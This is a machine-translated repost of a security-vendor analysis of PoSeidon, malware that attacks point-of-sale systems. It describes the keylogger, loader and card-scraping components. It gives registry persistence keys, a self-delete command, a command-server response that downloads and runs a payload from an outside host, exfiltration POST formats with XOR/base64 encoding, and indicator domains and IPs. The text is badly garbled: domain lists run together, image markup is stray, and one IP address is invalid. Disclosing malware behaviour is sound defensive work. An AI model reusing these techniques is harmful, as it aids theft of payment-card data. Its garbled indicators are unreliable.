The most complex poser malware PoSeidon so far

The most complex poser malware PoSeidon so far

Cisco Security Solutions (CSS) researchers recently discovered a new malware PoSeidon for PoS systems, which is extremely complex, it is called the most complex PoS malware so far.

Customers may use the PoS system when purchasing products at retail stores. If you use a credit or debit card, the PoS System reads the information stored on the magnetic stripe on the back of the credit card. Once the information is stolen from the merchant, it can be encoded into the magnetic stripe to create a new card. The black market will sell such information because attackers can easily monetize stolen credit card data. The number of events involving PoS malware has been increasing, affecting the large companies and the small shops where couples work, attracting the attention of many media. It is precisely because of the existence of a large amount of financial and personal information that these companies and PoS systems will always become very attractive targets for attackers.

Overview

Today, we will introduce a new malware for the PoS system. This software searches for credit card information in the PoS memory and sends the information to the server, which is used by the server. ru top-level domain names, which may be sold again. Some components in this new malware family (called PoSeidon) are shown in:

First, it loadsLoaderIt will try to stay in the target system to prevent system restart.LoaderThen, the system will contact the command and control server to receive a URL containing another program and download and execute it. The Downloaded Program isFindStrIt will install a keyboard recorder and scan the number sequence in the PoS device, which may be a credit card number. If verified, these numbers are indeed credit card numbers, the key records and credit card numbers are encoded and sent to a server.

Technical details

Keyboard Recorder

 

The SHA256 check value of this file is signature, which may be the source of PoS system attacks. We call this file KeyLogger based on its debugging information:

 

VcmlnaW5hbD0 = "http://www.bkjia.com/uploads/allimg/150407/0419252033-1.png! Small "src =" http://www.bkjia.com/uploads/allimg/150407/0419252033-1.png "title =" image083.png "/>

Once executed, this file will copy itself%SystemRoot % \ system32 \ <filename>. exe or % UserProfile % \ <filename>. and add the registry key to HKLM (or HKCU) \ Software \ Microsoft \ Windows \ CurrentVersion \ Run.

This file also opens HKCU \ Software \ LogMeIn Ignition, opens and deletes the PasswordTicket key value, and obtains the Email key value, it also deletes the Registry directory tree HKCU \ Software \ LogMeInIgnition \ <key> \ Profiles \*.

The file uses the POST method to send data to an address in the following URI:

wondertechmy[.]com/pes/viewtopic.phpwondertechmy[.]ru/pes/viewtopic.phpwondwondnew[.]ru/pes/viewtopic.php

 

The URI format is

uid=%I64u&win=%d.%d&vers=%s

The keyboard recorder component is used to steal passwords, and may also be the initial channel to infect machines.

Loader

We call this fileLoaderIs based on its debugging information:

After the Loader runs, it checks whether it is executed in the following two file names:

WinHost.exeWinHost32.exe

 

If not, it will ensure that there is no Windows Service running with the WinHost name.LoaderWill copy itself% SystemRoot % \ System32 \ WinHost.exeTo overwrite any files that may be named with the same name. Next,LoaderStarts a service named WinHost.

The reason for this is that even if the current user logs out, it will remain in the memory. If the Loader cannot turn itself into a service, it will terminate its other instances in the memory. Copy itself to % UserProfile % \ WinHost32.exe and install the registry key HKCU \ Microsoft \ Windows \ CurrentVersion \ Run \ WinHost32. Finally, it creates a new process for execution.% UserProfile % \ WinHost32.exe.

Now that it can remain in the system, Loader will execute the following command to delete itself:

cmd.exe /c del <path_to_itself> >> NUL

The Loader running in the memory will try to read% SystemRoot % \ System32 \ WinHost.exe. cfgThe configuration file here. This file contains a URL list, which will be added to the URL list that has been hardcoded to Loader.

 

Then Loader will contact a hard-coded C & C Server:

 

linturefa.comxablopefgr.comtabidzuwek.comlacdileftre.rutabidzuwek.comxablopefgr.comlacdileftre.ruweksrubaz.rulinturefa.rumifastubiv.ruxablopefgr.rutabidzuwek.ru

Corresponding IP Address:

151.236.11.167185.13.32.132185.13.32.48REDACTED at request of Federal Law Enforcement31.184.192.19691.220.131.11691.220.131.87

 

If the above domain name is resolved to an IP address, the program will send an http post request using the following user-agent string:

Mozilla/4.0 (compatible; MSIE 8.0;Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0)

POST data will be sent:

<IP ADDRESS>/ldl01/viewtopic.php<IP ADDRESS>/pes2/viewtopic.php

 

The POST data format is:

uid=%I64u&uinfo=%s&win=%d.%d&bits=%d&vers=%s&build=%s

The Loader should obtain such a response from the C & C Server:

{<CommandLetter >:< parameter (ArgumentString)>}

 

Example:

{R:http://badguy.com/malwarefilename.exe}{b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}

The executable file in the server response is obtained and executed, and the second part of PoSeidon is available.

FindStr

We call this file FindStr based on its debugging information:

 

This file will install a very small keyboard recorder in the system, which is very similar to the description here. The data intercepted by this keyboard recorder will be sent to the server later.

 

This malware looks for a specific number sequence in the memory:

A 16-digit number (Discover, Visa, Mastercard credit card) that starts with 6, 5, and 4 and starts with 3 (AMEX credit card)

Then it uses the Luhn algorithm to verify whether these numbers are real credit or debit card numbers. The code snippet is as follows:

Next, it will try to resolve the following domain names, some of which are well-known data theft servers:

quartlet.comhorticartf.comkilaxuntf.rudreplicag.rufimzusoln.ruwetguqan.ru

 

If the above domain name is resolved to an IP address, the program will send an http post request using the following user-agent string:

Mozilla/4.0 (compatible; MSIE 8.0;Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0)

POST data will be sent:

<IPADDRESS>/pes13/viewtopic.php

 

Data format:

oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s

Optional POST data (data: Credit card number, logs: Key record data)

& Data = <XOR with 0x2A, base64 encoded data> & logs = <XOR with 0x2A, and base64 encoded data>

 

The data sent to the credit card number and keyboard recorder on the server is calculated by XOR and base64-encoded.

The server response should be:

This mechanism allows malware to update itself based on commands received from the server.

Loader vs FindStr

Bindiff is used to compare unpackaged Loader (version 11.4) with unpackaged FindStr (version 7.1). The result shows that the function 62% is the same. Attackers behind malware may have developed some core functions and compiled them into the library. Then other projects they developed can directly use these functions.

IOC

Click to view the IOC version of the terminal.

Win. Trojan. PoSeidon. RegistryItem. ioc
Win. Trojan. PoSeidon. ProcessItem. ioc
Win. Trojan. PoSeidon. FileItem. ioc

 

Domain Name

 

linturefa.comxablopefgr.comtabidzuwek.comlinturefa.ruxablopefgr.rutabidzuwek.ruweksrubaz.rumifastubiv.rulacdileftre.ruquartlet.comhorticartf.comkilaxuntf.rudreplicag.rufimzusoln.ruwetguqan.ru

IP Address:

151.236.11.167185.13.32.132185.13.32.48REDACTED at request of Federal Law Enforcement31.184.192.19691.220.131.11691.220.131.87REDACTED at request of Federal Law Enforcement

 

Conclusion

PoSeidon is another malware for the PoS system. It shows its superb technology. Attackers will continue to attack the PoS system and use various obfuscation techniques to escape detection. As long as PoS attacks provide rewards, attackers will continue to develop new malware. Network administrators should be vigilant and use the best solution to protect them from such malware attacks.